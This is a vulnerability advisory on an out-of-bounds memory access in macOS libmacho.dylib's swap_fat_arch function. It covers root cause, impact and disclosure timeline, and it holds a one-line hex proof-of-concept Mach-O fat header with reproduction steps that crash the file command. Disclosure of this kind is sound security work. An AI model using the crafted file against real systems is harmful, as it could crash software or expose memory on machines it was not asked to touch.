Skip to content
Accueil » RESEARCH – 2025-43254

RESEARCH – 2025-43254

Out-of-Bounds Memory Access in macOS libmacho.dylib

Overview

A security vulnerability has been identified in macOS’s libmacho.dylib library. The bug allows an attacker to cause an out-of-bounds memory access through a specially crafted Mach-O fat binary file, potentially leading to information disclosure or remote code execution.

  • Vulnerability Type: Out-of-bounds memory access
  • Severity: High
  • Affected Component: libmacho.dylib
  • Affected Versions: macOS Sonoma
  • CVE Identifier: 2025-43254

Technical Details

Description

The vulnerability exists in the swap_fat_arch function in libmacho.dylib, which is responsible for byte-swapping architecture-specific sections of Mach-O fat binary files. This library is used by the macOS file command to identify file types, making the vulnerability exploitable through this common utility. The function fails to properly validate the architecture count specified in the fat header before attempting to process it.

By providing an extremely large architecture count value (e.g., 0x80000003, over 2 billion), an attacker can cause the function to access memory far beyond the bounds of the input buffer, resulting in a segmentation fault.

Root Cause

The function swap_fat_arch takes a pointer to a fat header (x0) and the number of architectures (x1) as parameters but does not validate that:

1. The architecture count is reasonable

2. Memory accesses remain within the bounds of the buffer

The vulnerability can be triggered at different points in the function:

1. At offset `+12: ldur q0, [x9, #-0x10] – When trying to load the fat header itself

2. At offset +24: ldr w10, [x9] – When trying to load an architecture entry

Proof of Concept

A malformed Mach-O fat binary with the following characteristics triggers the vulnerability:

00000000 cb fe ba be 80 00 00 03 00 00 00 00 00 01 00 00 |................|

Key elements:

  • Modified magic number: cb fe ba be (normally ca fe ba be)
  • Architecture count: 80 00 00 03 (0x80000003 = 2,147,483,651)

When this file is processed by any application using libmacho.dylib, it causes a segmentation fault with: EXC_BAD_ACCESS (code=1, address=0x600020000000)

Reproduction Steps

1. Create a file with the above hex content 2. Process it with a tool that uses libmacho.dylib (e.g., otool, lipo, etc.) Example: file poc_file

Impact

This vulnerability could potentially allow attackers to:

1. Cause Denial of Service: Crash the file command and other applications that handle Mach-O files

2. Information Disclosure: Potentially read memory outside the intended buffer 3. Remote Code Execution: With further exploitation, this could possibly lead to arbitrary code execution

The vulnerability is particularly concerning because:

  • libmacho.dylib is used by many system components
  • Processing of Mach-O files occurs in various contexts including when downloading, opening, or installing applications
  • It could be triggered through malicious files delivered via web, email, or other means

Disclosure Timeline

  • 04/04/2025: Vulnerability discovered
  • 04/05/2025: Reported to Apple Product Security
  • 29/07/2025: Apple disclose the vulnerability publicly